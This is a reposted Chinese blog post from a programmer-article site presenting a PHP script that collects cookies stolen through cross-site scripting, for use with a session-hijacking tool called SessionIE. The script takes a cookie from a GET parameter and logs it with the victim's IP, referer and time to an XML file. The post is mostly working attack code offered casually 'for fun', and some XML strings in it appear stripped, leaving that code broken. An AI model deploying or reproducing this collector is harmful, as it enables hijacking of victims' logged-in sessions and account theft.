欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  php教程

配合XSS工具SessionIE的php脚本

程序员文章站 2024-02-12 23:47:04
...
我写的这个纯粹是好玩,没啥意思,说到底就是操作xml而已。缘起还是归结于前几天http://www.cncert.net在 我们的邮件列表发布了一个新的xss利用工具,类似老外的hamster,在客户端定时刷新保持session不超时。被跨站的人只要访问一次之后,攻击 者就可以一直保持登陆的状态。他这个工具用.net做的,为了方便,要求收集cookie的脚本把cookie保存为xml文件。他提供了一个asp程 序,我只有php空间,因此写了个php的作测试用。
代码:

date_default_timezone_set("Asia/Chongqing");

$my_file = "cookie.xml";

if( ! isset( $_GET[x] ) )
{
exit;
}

$my_cookie = $_GET[x];
if( $_GET[x] != "" )
{
if( ! file_exists( $my_file ) )
{
CreateXmlFile( );
}

AddData( $my_cookie );
}

function CreateXmlFile( )
{
global $my_file;

$fp = fopen( $my_file, "wb" );
if( ! $fp )
{
exit;
}

fwrite( $fp, " " );
fwrite( $fp, " " );
fwrite( $fp, " " );
fwrite( $fp, "
" );
fwrite( $fp, "
" );

fclose( $fp );
}

function AddData( $my_cookie )
{
global $my_file;

$doc = new DOMDocument( );
$doc->load( $my_file );
$doc->formatOutput = true;

$treeroot = $doc->getElementsBytagName( "treeroot" )->item(0);

$item = $doc->createElement( "item" );
$treeroot->appendChild( $item );

if( isset( $_SERVER["REMOTE_HOST"] ) )
{
$remote_host = $_SERVER["REMOTE_HOST"];
}
elseif( isset( $_SERVER["REMOTE_ADDR"] ) )
{
$remote_host = $_SERVER["REMOTE_ADDR"];
}
else
{
$remote_host = "NotCare";
}
$title = $doc->createElement( "title", $remote_host );
$item->appendChild( $title );

if( isset( $_SERVER["HTTP_REFERER"] ) )
{
$refer = $_SERVER["HTTP_REFERER"];
}
else
{
$refer = "http://yahoo.cn";
}
$link = $doc->createElement( "link", $refer );
$item->appendChild( $link );

$src_ip = $doc->createElement( "src_ip", $_SERVER["REMOTE_ADDR"] );
$item->appendChild( $src_ip );

$src_os = $doc->createElement( "src_os", "NotCare" );
$item->appendChild( $src_os );

$pubDate = $doc->createElement( "pubDate", date( "r" ) );
$item->appendChild( $pubDate );

$description = $doc->createElement( "description", $my_cookie );
$item->appendChild( $description );

$doc->save( $my_file );
}

?>